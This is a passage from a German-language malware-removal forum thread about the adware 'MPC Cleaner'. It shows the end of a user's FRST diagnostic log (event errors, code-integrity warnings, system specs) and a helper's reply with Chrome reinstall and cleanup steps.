Error: (03/31/2016 12:34:33 PM) (Source: Microsoft-Windows-AppModel-State) (EventID: 10) (User: SCHNEIDER)
Description: microsoft.windowscommunicationsapps_8wekyb3d8bbwe2
Error: (03/31/2016 12:34:33 PM) (Source: Microsoft-Windows-AppModel-State) (EventID: 10) (User: SCHNEIDER)
Description: microsoft.windowscommunicationsapps_8wekyb3d8bbwe2
Error: (03/31/2016 12:34:33 PM) (Source: Microsoft-Windows-AppModel-State) (EventID: 10) (User: SCHNEIDER)
Description: microsoft.windowscommunicationsapps_8wekyb3d8bbwe2
Error: (03/31/2016 12:34:33 PM) (Source: Microsoft-Windows-AppModel-State) (EventID: 10) (User: SCHNEIDER)
Description: microsoft.windowscommunicationsapps_8wekyb3d8bbwe2
Error: (03/31/2016 12:34:33 PM) (Source: Microsoft-Windows-AppModel-State) (EventID: 10) (User: SCHNEIDER)
Description: microsoft.windowscommunicationsapps_8wekyb3d8bbwe2
Error: (03/31/2016 12:34:33 PM) (Source: Microsoft-Windows-AppModel-State) (EventID: 10) (User: SCHNEIDER)
Description: microsoft.windowscommunicationsapps_8wekyb3d8bbwe2
Error: (03/31/2016 12:34:33 PM) (Source: Microsoft-Windows-AppModel-State) (EventID: 10) (User: SCHNEIDER)
Description: microsoft.windowscommunicationsapps_8wekyb3d8bbwe2
Error: (03/31/2016 12:34:33 PM) (Source: Microsoft-Windows-AppModel-State) (EventID: 10) (User: SCHNEIDER)
Description: microsoft.windowscommunicationsapps_8wekyb3d8bbwe2
Error: (03/31/2016 12:34:33 PM) (Source: Microsoft-Windows-AppModel-State) (EventID: 10) (User: SCHNEIDER)
Description: microsoft.windowscommunicationsapps_8wekyb3d8bbwe2
Systemfehler:
=============
Error: (03/31/2016 12:30:42 PM) (Source: bowser) (EventID: 8016) (User: )
Description: Der Suchdiensttreiber erhielt zu viele nicht erlaubte Datagramme vom Remotecomputer "O2BOX" zum Namen "SCHNEIDER" auf Transport "NetBT_Tcpip_{CDCF1B09-7464-4C3E-A16A-C67E31D926EC}". Das Datagramm steht in den Daten.
Es werden keine weiteren Ereignisse erzeugt, solange die Rücksetzfrequenz nicht abgelaufen ist.
Error: (03/30/2016 11:54:25 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Der Dienst "eapihdrv" wurde aufgrund folgenden Fehlers nicht gestartet:
%%1275
Error: (03/30/2016 11:54:25 PM) (Source: Application Popup) (EventID: 1060) (User: )
Description: \??\C:\Users\Denny\AppData\Local\Temp\ehdrv.sys
Error: (03/30/2016 11:54:24 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Der Dienst "eapihdrv" wurde aufgrund folgenden Fehlers nicht gestartet:
%%1275
Error: (03/30/2016 11:54:24 PM) (Source: Application Popup) (EventID: 1060) (User: )
Description: \??\C:\Users\Denny\AppData\Local\Temp\ehdrv.sys
Error: (03/30/2016 11:54:23 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Der Dienst "eapihdrv" wurde aufgrund folgenden Fehlers nicht gestartet:
%%1275
Error: (03/30/2016 11:54:23 PM) (Source: Application Popup) (EventID: 1060) (User: )
Description: \??\C:\Users\Denny\AppData\Local\Temp\ehdrv.sys
Error: (03/30/2016 01:43:18 PM) (Source: Service Control Manager) (EventID: 7030) (User: )
Description: Der Dienst "PEVSystemStart" ist als interaktiver Dienst gekennzeichnet. Das System wurde jedoch so konfiguriert, dass interaktive Dienste nicht möglich sind. Der Dienst wird möglicherweise nicht richtig funktionieren.
Error: (03/30/2016 01:43:17 PM) (Source: Service Control Manager) (EventID: 7030) (User: )
Description: Der Dienst "PEVSystemStart" ist als interaktiver Dienst gekennzeichnet. Das System wurde jedoch so konfiguriert, dass interaktive Dienste nicht möglich sind. Der Dienst wird möglicherweise nicht richtig funktionieren.
Error: (03/30/2016 01:43:17 PM) (Source: Service Control Manager) (EventID: 7030) (User: )
Description: Der Dienst "PEVSystemStart" ist als interaktiver Dienst gekennzeichnet. Das System wurde jedoch so konfiguriert, dass interaktive Dienste nicht möglich sind. Der Dienst wird möglicherweise nicht richtig funktionieren.
CodeIntegrity:
===================================
Date: 2016-01-27 20:34:50.024
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\SpaceSoundPro\SpaceSoundPro.dll because the set of per-page image hashes could not be found on the system.
Date: 2016-01-27 20:33:27.259
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\SpaceSoundPro\SpaceSoundPro.dll because the set of per-page image hashes could not be found on the system.
Date: 2016-01-27 20:31:32.120
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\SpaceSoundPro\SpaceSoundPro.dll because the set of per-page image hashes could not be found on the system.
Date: 2016-01-27 20:31:31.842
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\SpaceSoundPro\SpaceSoundPro.dll because the set of per-page image hashes could not be found on the system.
Date: 2016-01-27 20:31:21.532
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\SpaceSoundPro\SpaceSoundPro.dll because the set of per-page image hashes could not be found on the system.
Date: 2016-01-27 20:31:21.366
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\SpaceSoundPro\SpaceSoundPro.dll because the set of per-page image hashes could not be found on the system.
Date: 2016-01-27 20:31:19.557
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\SpaceSoundPro\SpaceSoundPro.dll because the set of per-page image hashes could not be found on the system.
Date: 2016-01-27 20:31:13.438
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\SpaceSoundPro\SpaceSoundPro.dll because the set of per-page image hashes could not be found on the system.
Date: 2016-01-27 20:31:00.333
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\SpaceSoundPro\SpaceSoundPro.dll because the set of per-page image hashes could not be found on the system.
Date: 2016-01-27 20:31:00.166
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\SpaceSoundPro\SpaceSoundPro.dll because the set of per-page image hashes could not be found on the system.
==================== Speicherinformationen ===========================
Prozessor: Intel(R) Core(TM) i5-3337U CPU @ 1.80GHz
Prozentuale Nutzung des RAM: 33%
Installierter physikalischer RAM: 3971.27 MB
Verfügbarer physikalischer RAM: 2637.68 MB
Summe virtueller Speicher: 8067.27 MB
Verfügbarer virtueller Speicher: 6257.06 MB
==================== Laufwerke ================================
Drive c: (Acer) (Fixed) (Total:449.11 GB) (Free:391.68 GB) NTFS
==================== MBR & Partitionstabelle ==================
========================================================
Disk: 0 (Size: 465.8 GB) (Disk ID: 30743A9D)
Partition: GPT.
==================== Ende von Addition.txt ============================
|
|
31.03.2016, 12:34
| #15 |
| /// Malwareteam | MPC Cleaner lässt sich nicht löschen (Maleware) Darum mach ich das doch hier :P Dein Chrome passt so immer noch nicht... Bitte downloade und installiere dir Chrome neu -> entferne es vollständig mit Revo -> intsalliere Chrome wieder neu wenn du ihn benutzt. Danach nochmal neue Logs bitte
__________________ Mfg, Rafael ~ I'm storm. I'm calm. I'm fire. I'm ice. I'm burningice. ~ Unterstütze uns mit einer Spende ......... Lob, Kritik oder Wünsche ......... .......... Folge uns auf Facebook .......... |
|
| Themen zu MPC Cleaner lässt sich nicht löschen (Maleware) |
| angeblich, avira, berechtigungen, browser, browsern, cleaner, gen, grund, helfer, hoffe, kleines, langsam, löschen, maleware, maleware mpccleaner, malewarebytes, mpc cleaner, neustart, nicht löschen, nicht mehr, ordner, programm, scans, taucht, tools, unterschiedliche, versucht |
dann auf 
und dann auf 
. 
Linear-Darstellung
